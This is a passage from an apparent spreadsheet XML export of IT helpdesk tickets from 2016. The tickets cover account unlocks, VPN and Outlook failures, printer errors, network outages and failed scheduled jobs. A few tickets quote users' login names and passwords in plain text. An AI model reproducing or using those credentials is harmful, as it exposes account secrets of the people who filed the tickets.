    <x v="6"/>
  </r>
  <r>
    <s v="o drive missing"/>
    <s v="o drive missing"/>
    <s v="xzupryaf vlbikhsm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="dw0080 unlock in erp SID_34"/>
    <s v="dw0080 unlock in erp SID_34"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to reach the collaboration_platform or crm"/>
    <s v="_x000d__x000a__x000d__x000a_received from: yorgbnpa.ndigthpj@gmail.com_x000d__x000a__x000d__x000a_this is the error information:_x000d__x000a__x000d__x000a_if that doesn't help, contact your support team and include these technical details:_x000d__x000a_correlation id: 0b0dac9d-8010-3000-b1eb-26ad5dd2741f_x000d__x000a_date and time: 10/10/2016 5:49:16 am_x000d__x000a_url: #/sitepages/home.aspx_x000d__x000a_user: yorgbnpa.ndigthpj@gmail.com_x000d__x000a_issue type: user not in directory._x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="yorgbnpa ndigthpj"/>
    <x v="15"/>
  </r>
  <r>
    <s v="s"/>
    <s v="s"/>
    <s v="gzjtweph mnslwfqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="qlhmawgi sgwipoxn unlock and password reset ipglathybel"/>
    <s v="ipglathybel qlhmawgi sgwipoxn password reset in erp "/>
    <s v="clgfntoe rhtmnzsk"/>
    <x v="19"/>
  </r>
  <r>
    <s v="network outage:germany, germany site hard down since 8:30 am et on 10/10."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _____no____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ______8:30 am et on 10/10.________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ___no____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ____na___    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  __yes____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ___no_____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ____na______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    _______na____    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  ____no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x v="7"/>
  </r>
  <r>
    <s v="outlook send/receive progress error"/>
    <s v="i am unable to send from our ebusiness@company.com email. i had no problems up to last week. see screenshot of error."/>
    <s v="zsulhnxd gexdzoqy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to launch outlook"/>
    <s v="unable to launch outlook"/>
    <s v="cmplfihy tajmzhfl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="zebra printer is not working after some updates "/>
    <s v="hello&lt; when i try to print on zebra this error message appair _x000d__x000a_please see the screen shot message ._x000d__x000a_it seems that the problem is the erp connection ._x000d__x000a__x000d__x000a_"/>
    <s v="lzapwbnc yrjekzqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_1 account unlock and password reset"/>
    <s v="erp SID_1 account unlock and password reset"/>
    <s v="wvqgbdhm fwchqjor"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit laser02 \pfjwinbg ljtzbdqg"/>
    <s v="probleme mit laser02 \pfjwinbg ljtzbdqg"/>
    <s v="pfjwinbg ljtzbdqg"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit lasplant_119 \pfjwinbg ljtzbdqg"/>
    <s v="probleme mit lasplant_119 \pfjwinbg ljtzbdqg"/>
    <s v="pfjwinbg ljtzbdqg"/>
    <x v="24"/>
  </r>
  <r>
    <s v="archiving_tool client log file"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qjtbrvfy.avwqmhsp@gmail.com_x000d__x000a__x000d__x000a_dear it team,_x000d__x000a__x000d__x000a_archiving_tool archive does not open any inwarehouse_toolsâ€¦_x000d__x000a__x000d__x000a_please repair. "/>
    <s v="qjtbrvfy avwqmhsp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="plant_269 - erp error "/>
    <s v="_x000a__x000a_received from: dpuifqeo.eglwsfkn@gmail.com_x000a__x000a_getting this error when trying to print labels using zebra printers in shipping_x000a__x000a_[cid:image001.jpg@01d222cc.865bed90]_x000a__x000a_from: thoyhts brthyrtiv_x000a_sent: monday, october 10, 2016 8:02 am_x000a_to: dpuifqeo eglwsfkn &lt;dpuifqeo.eglwsfkn@gmail.com&gt;_x000a_subject: re: imp_x000a__x000a_yes because that is a erp error message._x000a__x000a_"/>
    <s v="dpuifqeo eglwsfkn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user vvhthyoffc blocked (citrix)"/>
    <s v="user vvbthryhn is blocked for citrix access, please unlock. "/>
    <s v="wjdatzyv bhkoldjv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="rÃ¼cksetzung der passwÃ¶rter fÃ¼r accounts vvwtyeidt, vvftgors, vvnergtubj, vvthygschj"/>
    <s v="rÃ¼cksetzung der passwÃ¶rter fÃ¼r accounts vvwtyeidt, vvftgors, vvnergtubj, vvthygschj"/>
    <s v="yvjdluhk hmcpvtdj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lean event can not be added."/>
    <s v="lean event can not be added."/>
    <s v="sclfndob gnibctwu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="scm_software "/>
    <s v="_x000a__x000a_received from: oetlgbfw.bsctrnwp@gmail.com_x000a__x000a_my supply_chain_software scm_software password has locked_x000a__x000a_please reset so i can log in_x000a__x000a_dthyan matheywtyuews_x000a_sales manager gl2_x000a_oetlgbfw.bsctrnwp@gmail.com&lt;mailto:oetlgbfw.bsctrnwp@gmail.com&gt;_x000a__x000a__x000a__x000a_"/>
    <s v="oetlgbfw bsctrnwp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="usa: dell rack system - bfr78x1 hardware component: warning or critical state detected"/>
    <s v="iom sensor, chassis and internal power supply has reporting some &quot;non critical&quot; alerts. could you please investigate and advise? "/>
    <s v="mnlazfsr mtqrkhnx"/>
    <x v="11"/>
  </r>
  <r>
    <s v="zebra printer issue"/>
    <s v="label printer not working. error &quot;connection to erp could not be made&quot;._x000d__x000a__x000d__x000a_ip's: 51.87.92.3022_x000d__x000a_74.78.07.2808_x000d__x000a_79.54.90.8526_x000d__x000a_06.52.09.1807_x000d__x000a_39.58.59.0786_x000d__x000a_39.58.59.0781_x000d__x000a__x000d__x000a_error in attachment_x000d__x000a_labels are not getting printed."/>
    <s v="qasdhyzm yuglsrwx"/>
    <x v="7"/>
  </r>
  <r>
    <s v="zebra printer issue"/>
    <s v="label printer not working. error &quot;connection to erp could not be made&quot;._x000d__x000a_printer name : prtoplant_168_x000d__x000a__x000d__x000a_multiple location are affected. usa, germany also having same issues."/>
    <s v="xrmvbenu pynjmqci"/>
    <x v="0"/>
  </r>
  <r>
    <s v="submitted filled up engineering_tool on system"/>
    <s v="i created engineering_tool and filled up all datas but when click to submit button it is given error message. please see message detail below. "/>
    <s v="fhcmnxat geazkjcs"/>
    <x v="25"/>
  </r>
  <r>
    <s v="erp crm - instant timeout"/>
    <s v="user: kubyhtuaa_x000a_issue: when working with erp crm user encounters instant timeouts. please resolve or advise how to resolve."/>
    <s v="yjqvpkgn qbshvpje"/>
    <x v="14"/>
  </r>
  <r>
    <s v="zebra printer issue"/>
    <s v="label printer not working. error &quot;connection to erp could not be made&quot;._x000d__x000a_printer name : prtor0036, prtor0031_x000d__x000a__x000d__x000a_labels are not getting printed."/>
    <s v="ayvqmkdx mzjcslnq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="set abc code erp 81807016 under me in crm. "/>
    <s v="set abc code erp 81807016 under me in crm. in erp is ok."/>
    <s v="srhoeyza rkhuldgq"/>
    <x v="39"/>
  </r>
  <r>
    <s v="i have been locked out of my accounts"/>
    <s v="_x000a__x000a_received from: plqbesvo.uopaexic@gmail.com_x000a__x000a_please help me reset my password_x000a_login is (dabhrujir3thy)_x000a_password was (ryljar42667)_x000a_"/>
    <s v="plqbesvo uopaexic"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 10/10/2016 06:51:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 10/10/2016 06:51:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="jehlsagi dhkfuswg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="automatische anmeldung"/>
    <s v="wenn ich outlook aufrufe, will der rechner gleichzeitig sich auch noch mit collaboration_platform (?) verbinden._x000a__x000a_das lautet : mit ihrem geschÃ¤fts- oder schulkonto anmelden. wenn ich meine emailadresse und mein password eingebe passiert aber nichts._x000a_das stÃ¤ndige einblenden ist sehr stÃ¶rend_x000a__x000a_bitte um abhilfe_x000a__x000a_meine telefonnummer ist "/>
    <s v="dhraxivp enmfvuqb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i cannot access the dob report.  i was able to access this before.  i need this report for the  global busienss"/>
    <s v="i cannot access the dob report.  i was able to access this before.  i need this report for the global busienss"/>
    <s v="vsbtygin oufhtbas"/>
    <x v="56"/>
  </r>
  <r>
    <s v="printer ag99 - printing ink empty"/>
    <s v="_x000d__x000a__x000d__x000a_received from: przcxbml.vnjdghui@gmail.com_x000d__x000a__x000d__x000a_hello support team,_x000d__x000a__x000d__x000a_the printer ag99 needs printing ink._x000d__x000a__x000d__x000a_where do i get paper for the printer?_x000d__x000a__x000d__x000a_may i ask you to support here._x000d__x000a__x000d__x000a_"/>
    <s v="przcxbml vnjdghui"/>
    <x v="28"/>
  </r>
  <r>
    <s v="not able to connect to vpn"/>
    <s v="not able to connect to vpn"/>
    <s v="mtzjkhpi sfcmyjzx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable process break bulk (sto)"/>
    <s v="_x000a__x000a_received from: rxoynvgi.ntgdsehl@gmail.com_x000a__x000a_hi it team_x000a__x000a_kindly please assist as we unable to close break bulk (sto) in ecs system due to nothing in the system._x000a__x000a_we have completely bulk for plant_283 and plant_101 sto in ecs system but nothing shown._x000a__x000a_below attached your reference._x000a__x000a_[cid:image001.png@01d2231d.d8c5ef80]_x000a__x000a__x000a_hydstheud mddwwyleh_x000a_operation supervisor_x000a_company distribution services of asia pte ltd_x000a_( asia regional distribution centre)_x000a__x000a_email : rxoynvgi.ntgdsehl@gmail.com&lt;mailto:rxoynvgi.ntgdsehl@gmail.com&gt;"/>
    <s v="rxoynvgi ntgdsehl"/>
    <x v="17"/>
  </r>
  <r>
    <s v="abholen alte it equipment (2x cad ws nd monitor )\umykjweg jpwrfuhk"/>
    <s v="abholen alte it equipment (2x cad ws nd monitor )\umykjweg jpwrfuhk"/>
    <s v="umykjweg jpwrfuhk"/>
    <x v="24"/>
  </r>
  <r>
    <s v="reset password"/>
    <s v="_x000a__x000a_received from: rugdyxqh.aqvocmuy@gmail.com_x000a__x000a_good day all_x000a__x000a_please assist me in resetting my erp password_x000a__x000a_user name krugew245_x000a__x000a_kind "/>
    <s v="rugdyxqh aqvocmuy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bugs in to do list _operator dashbankrd"/>
    <s v="please find the attachment for the issue detail."/>
    <s v="yrogbkts lmurgdcf"/>
    <x v="40"/>
  </r>
  <r>
    <s v="network outage:juarez-dmvpn-1811-rtr01 is down since 4:39 am et on 10/10"/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _____no____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ____ 4:39 am et on 10/10__________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? __no_____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ___na____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  _no_____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ___na__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x v="7"/>
  </r>
  <r>
    <s v="eu remote fails to connect ... na remote terminates automatically"/>
    <s v="i'm trying to connect to eu remote, but only get ..._x000d__x000a__x000d__x000a_your session is finished. _x000d__x000a_logged out successfully._x000d__x000a_"/>
    <s v="ctvaejbo mjcerqwo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp password change with password_management_tool: error: password change failed. old password is invalidated"/>
    <s v="hi gso,_x000d__x000a_i tried thrgxqsuojr xwbesorfs to renew my password from erp with password_management_tool password manager. it doesnt work...._x000d__x000a__x000d__x000a_error message:_x000d__x000a_error: password change failed. old password is invalidated. please try again using a different password. failed to perform operation [reset]. _x000d__x000a__x000d__x000a_please reset my password._x000d__x000a__x000d__x000a_"/>
    <s v="vykbweum hpvctbse"/>
    <x v="0"/>
  </r>
  <r>
    <s v="install hardcopy \ewew8323647 \rhaycqjg arcgonvy"/>
    <s v="install hardcopy \ewew8323647 \rhaycqjg arcgonvy"/>
    <s v="rhaycqjg arcgonvy"/>
    <x v="24"/>
  </r>
  <r>
    <s v="can not connect to the hana server via us vpn"/>
    <s v="i'm using the us vpn as the european one is down fjaqbgnld yukdzwxs.  i can't reach the hana box.  i can connect to all other machines on the network. i have attached the reporting_tool failure and a tracert to the box.  i have rebooted my machine and broadband."/>
    <s v="hldifrbv gadyktfz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="circuit outage: germany ,erkheim-dmvpn-2821-rtr01 is down since 3:31 am et on 10/09."/>
    <s v="what type of outage:  _____network     _ x___circuit     ____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ____3:31 am et on 10/09.__________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ____no___    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ____na___    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  ____yes__    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ___yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ______na_____   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    _______na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x v="7"/>
  </r>
  <r>
    <s v="probleme mit we110 \die druckerwarteschlange wird zurzeit nicht ausgefÃ¼hrt \fdyietau dvsyxwbu"/>
    <s v="probleme mit we110 \die druckerwarteschlange wird zurzeit nicht ausgefÃ¼hrt \fdyietau dvsyxwbu"/>
    <s v="fdyietau dvsyxwbu"/>
    <x v="24"/>
  </r>
  <r>
    <s v="paper jam for insert printer "/>
    <s v="paper jam for insert printer "/>
    <s v="tcoyfeph cqrdaunw"/>
    <x v="31"/>
  </r>
  <r>
    <s v="different problems - please reinstall eagw8111412 with current fy17 company image - upgrade ramdnty to 8gb"/>
    <s v="different problems - please reinstall eagw8111412 with current fy17 company image - upgrade ramdnty to 8gb"/>
    <s v="jkshpurg isjgbdch"/>
    <x v="28"/>
  </r>
  <r>
    <s v="enter and edit the link"/>
    <s v="vroxskje.bixtmefd@gmail.com need to enter and edit the link:{e248922f-456b-4fdd-8c6d-d94083a94009}&amp;file=apac%20-%20approved%20exception%20list.xlsx&amp;action=default"/>
    <s v="vroxskje bixtmefd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn not getting log in"/>
    <s v="name:vithrkas _x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:xiwegtas.ygrfbzon@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:vpn not getting log in"/>
    <s v="xiwegtas ygrfbzon"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i cant have preview of pictures in explorer. i just see icons."/>
    <s v="i cant have preview of pictures in explorer. i just see icons._x000a_"/>
    <s v="cqwtksbu tgxockrn"/>
    <x v="28"/>
  </r>
  <r>
    <s v="host HostName_1178 is disconnected in vsphere"/>
    <s v="host HostName_1178 is disconnected in vsphere"/>
    <s v="bozdftwx smylqejw"/>
    <x v="11"/>
  </r>
  <r>
    <s v="vpn connection issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qwvpgayb.amniujsh@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a_i cannot access the vpn. when i click on &quot;open new session&quot; nothing happens._x000d__x000a_"/>
    <s v="qwvpgayb amniujsh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp password &amp; password -- reg"/>
    <s v="_x000a__x000a_received from: xdvwitpm.zscxqdho@gmail.com_x000a__x000a_sir,_x000a__x000a_my user id is bathylardb &amp; given password is india16. but im unable to login to the erp_x000a__x000a_request you to reset the password &amp; send the same._x000a__x000a_"/>
    <s v="xdvwitpm zscxqdho"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_481 failed in job_scheduler at: 10/10/2016 03:09:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_481 failed in job_scheduler at: 10/10/2016 03:09:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="india pbx awyl8328998 is down since 2:56am et on 10/10/2016."/>
    <s v="india awyl8328998 is down since 2:56am et on 10/10/2016."/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="7"/>
  </r>
  <r>
    <s v="add user ashtusis pyhuule (phufsav) to active directory eagcutview"/>
    <s v="add user ashtusis pyhuule (phufsav) to active directory eagcutview_x000a_remove user yhru manyhsu (ayujdm) from this ad._x000a_"/>
    <s v="skocrqdw pexcdfao"/>
    <x v="19"/>
  </r>
  <r>
    <s v="germany, germany:gigabitethernet2/0/17  on germany-edksw002-2960-stack-sw002 went down at 10/10/2016 2:25 am et"/>
    <s v="germany, germany:gigabitethernet2/0/17  on germany-edksw002-2960-stack-sw002 went down at 10/10/2016 2:25 am et"/>
    <s v="bozdftwx smylqejw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="reset password erp SID_34"/>
    <s v="_x000a__x000a_received from: zuxcfonv.nyhpkrbe@gmail.com_x000a__x000a_gso,_x000a__x000a_please kindly reset password for zhhtyangq with erp SID_34  , "/>
    <s v="zuxcfonv nyhpkrbe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reeset password "/>
    <s v="reeset password "/>
    <s v="mdvlkbac uhefoqtg"/>
    <x v="31"/>
  </r>
  <r>
    <s v="skype lÃ¤d auf dem pc nicht."/>
    <s v="skype wird nicht vom browser geladen auch nicht nach langer wartezeit "/>
    <s v="qpbwfvdm ytlnodrv"/>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tvrigdbl mjsepfda"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unlock erp SID_34 "/>
    <s v="_x000d__x000a__x000d__x000a_received from: zuxcfonv.nyhpkrbe@gmail.com_x000d__x000a__x000d__x000a_gso,_x000d__x000a__x000d__x000a_please unlock the erp SID_34 for linz ,"/>
    <s v="zuxcfonv nyhpkrbe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype not work."/>
    <s v="_x000d__x000a__x000d__x000a_received from: yjwivxsh.fcetobrj@gmail.com_x000d__x000a__x000d__x000a_dear it team._x000d__x000a__x000d__x000a_my skype not work._x000d__x000a__x000d__x000a_best "/>
    <s v="yjwivxsh fcetobrj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no vpn access - pls help"/>
    <s v="_x000a__x000a_received from: luagmhds.iymwcelx@gmail.com_x000a__x000a_hi helpdesk,_x000a__x000a_when trying to access vpn, following message appears._x000a_i am unable to get in by clicking &quot;click here&quot;â€¦._x000a__x000a_pls help because i am doing ppm reviews from outside company office with my team today and need access to data from company foldersâ€¦._x000a__x000a_thx._x000a__x000a_[cid:image001.png@01d222c8.e67ad960]_x000a__x000a__x000a__x000a_micheyi gyhus_x000a_vice president_x000a__x000a_luagmhds.iymwcelx@gmail.com&lt;mailto:luagmhds.iymwcelx@gmail.com&gt;_x000a_company inc. | www.company.com&lt;_x000a__x000a_"/>
    <s v="luagmhds iymwcelx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="germany can't connect using vpn (f5 networks)"/>
    <s v="phone  email iewnguxv.bufwxeiy@gmail.com_x000a__x000a_germany can't connect to the local network using the f5-vpn connection._x000a_it worked until saturday, sunday morning we got just the screen ' your logoff was successfully' _x000a_i called the phone support, he fixed this,_x000a_but now, after logon we can't reach  erp and the servers in our plant.._x000a_ping failed._x000a_please fix this, our external employees can not work._x000a_"/>
    <s v="iewnguxv bufwxeiy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1148 failed in job_scheduler at: 10/10/2016 01:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1148 failed in job_scheduler at: 10/10/2016 01:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="cant connect to the network.mobile hot spot also not connecting.telecom_vendor_3 4g"/>
    <s v="cant connect to the network.mobile hot spot also not connecting..telecom_vendor_3 4g_x000a_-hecked the network connection  settings._x000a_-restarted the system.tried to connect.getting limited _x000a_ph:"/>
    <s v="otpkzifh gywinoml"/>
    <x v="18"/>
  </r>
  <r>
    <s v="EU_tool, chargenverwaltung, pdv"/>
    <s v="die systeme EU_tool, chargenverwaltung, pdv laufen absolut schlecht._x000d__x000a_man kann mit ihnen so&quot; nicht&quot; wirklich arbeiten._x000d__x000a__x000d__x000a_"/>
    <s v="hwxqoijt cotsgwrj"/>
    <x v="25"/>
  </r>
  <r>
    <s v="server HostName_1233 was down"/>
    <s v="c:\users\virakv&gt;ping HostName_1233.company.company.com_x000d__x000a__x000d__x000a_pinging HostName_1233.company.company.com [61.01.52.0260] with 32 bytes of data:_x000d__x000a_request timed out._x000d__x000a_request timed out._x000d__x000a_request timed out._x000d__x000a_request timed out._x000d__x000a__x000d__x000a_ping statistics for 61.01.52.0260:_x000d__x000a_    packets: sent = 4, received = 0, lost = 4 (100% loss),"/>
    <s v="kbnfxpsy gehxzayq"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to generate sto as per purrqs 4121889522/00001"/>
    <s v="unable to generate sto as per purrqs 4121889522/00001 , please find the error message as attached file.  please help fixing this issue aerp._x000d__x000a_"/>
    <s v="tqfnalpj qyoscnge"/>
    <x v="29"/>
  </r>
  <r>
    <s v="job Job_1141 failed in job_scheduler at: 10/09/2016 23:45:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1141 failed in job_scheduler at: 10/09/2016 23:45:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="vpn issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ygkzwsud.cvjgkxws@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_my vpn page is not responding, unable to connect._x000d__x000a__x000d__x000a_"/>
    <s v="ygkzwsud cvjgkxws"/>
    <x v="0"/>
  </r>
  <r>
    <s v="cannot start outlook email"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ynsqjehx.kqgrsawl@gmail.com_x000d__x000a__x000d__x000a_hi it team,_x000d__x000a__x000d__x000a__x000d__x000a_since yesterday my laptop was unable to start outlook mail. i could only use web mail now._x000d__x000a__x000d__x000a_any assistance to resolve this is appreciated._x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="ynsqjehx kqgrsawl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u2 failed in job_scheduler at: 10/09/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u2 failed in job_scheduler at: 10/09/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u1 failed in job_scheduler at: 10/09/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u1 failed in job_scheduler at: 10/09/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="job hr_payroll_na_u6 failed in job_scheduler at: 10/09/2016 23:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job hr_payroll_na_u6 failed in job_scheduler at: 10/09/2016 23:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="laptop cannot connect companysecure wifi network."/>
    <s v="laptop cannot connect companysecure wifi network."/>
    <s v="mqbxwpfn uclrqfxa"/>
    <x v="31"/>
  </r>
  <r>
    <s v="server HostName_1274 is not reachable"/>
    <s v="c:\users\virakv&gt;ping HostName_1274_x000d__x000a__x000d__x000a_pinging HostName_1274.company.company.com [82.02.04.7140] with 32 bytes of data:_x000d__x000a_request timed out._x000d__x000a_request timed out._x000d__x000a_request timed out._x000d__x000a_request timed out._x000d__x000a__x000d__x000a_ping statistics for 82.02.04.7140:_x000d__x000a_    packets: sent = 4, received = 0, lost = 4 (100% loss),_x000d__x000a_"/>
    <s v="tkbuhcnq kdheauqo"/>
    <x v="11"/>
  </r>
  <r>
    <s v="please help for vpn connection, try to contacted but can't!"/>
    <s v="name:wanayht_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:xztveoqs.zyrnqiav@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:please help for vpn connection, try to contacted but can't!"/>
    <s v="xztveoqs zyrnqiav"/>
    <x v="0"/>
  </r>
  <r>
    <s v="dell:7350: laptop will not stay connected to the internet."/>
    <s v="name:stgyott gdhdyrham_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:stgyott.gdhdyrham@company.com_x000a_customer number:_x000a_telephone:+6sartlgeo lhqksbd_x000a_summary:hi i have a dell latitude 7350 which i use from home office &amp; remotely. laptop will not stay connected to the internet. can you assist please?"/>
    <s v="kizybvpj hisaobfx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="msd crm--outlook ä¸€ç›´æ˜¾ç¤ºæ­£åœ¨å¯åŠ¨ï¼Œä¸èƒ½è¿›å…¥æ­£å¸¸ç•Œé¢ã€‚"/>
    <s v="please provide details of the issue._x000d__x000a_outlook ä¸€ç›´æ˜¾ç¤ºæ­£åœ¨å¯åŠ¨ï¼Œä¸èƒ½è¿›å…¥æ­£å¸¸ç•Œé¢ã€‚"/>
    <s v="loesgbfh tknsuhvw"/>
    <x v="31"/>
  </r>
  <r>
    <s v="erp SID_34 password "/>
    <s v="_x000d__x000a__x000d__x000a_received from: zuxcfonv.nyhpkrbe@gmail.com_x000d__x000a__x000d__x000a_gso ,_x000d__x000a__x000d__x000a_please reset password for hanx123 , "/>
    <s v="zuxcfonv nyhpkrbe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hpqc installation"/>
    <s v="_x000d__x000a__x000d__x000a_received from: elixsfvu.pxwbjofl@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_i'm trying to install hpqc for travel_tool uacyltoe hxgayczeing with my windows user name and password but have the following error message._x000d__x000a__x000d__x000a_[cid:image001.png@01d222cf.33a9b3e0]_x000d__x000a__x000d__x000a_best "/>
    <s v="elixsfvu pxwbjofl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn not working for rjeyfxlg ltfskygw"/>
    <s v="219581173[â€Ž10/â€Ž10/â€Ž2016 5:01 am] lzspyjki smdbqnef: _x000a_ok_x000a_[â€Ž10/â€Ž10/â€Ž2016 5:02 am] lzspyjki smdbqnef: _x000a_bring up notepad_x000a_her name is oyunatye_x000a_[â€Ž10/â€Ž10/â€Ž2016 5:03 am] _x000a_"/>
    <s v="lzspyjki smdbqnef"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1306 failed in job_scheduler at: 10/09/2016 18:11:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1306 failed in job_scheduler at: 10/09/2016 18:11:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="job Job_461 failed in job_scheduler at: 10/09/2016 17:41:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_461 failed in job_scheduler at: 10/09/2016 17:41:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="node HostName_1195 located at usa is down since 10/9/2016 10:32 am"/>
    <s v="node HostName_1195 located at usa is down since 10/9/2016 10:32 am._x000d__x000a__x000d__x000a_node down due to the power flap._x000d__x000a_check with the site admin during the business hours on monday."/>
    <s v="spxqmiry zpwgoqju"/>
    <x v="7"/>
  </r>
  <r>
    <s v="HostName_1238:application plm - dsc file on node HostName_1238 is unreachable&quot; "/>
    <s v="HostName_1238:application plm - dsc file on node HostName_1238 is unreachable&quot; "/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="13"/>
  </r>
  <r>
    <s v="HostName_521:application plm conversion server on node HostName_521 is warning&quot; action "/>
    <s v="HostName_521:application plm conversion server on node HostName_521 is warning&quot; action "/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="13"/>
  </r>
  <r>
    <s v="job Job_1393 failed in job_scheduler at: 10/09/2016 10:55:00  "/>
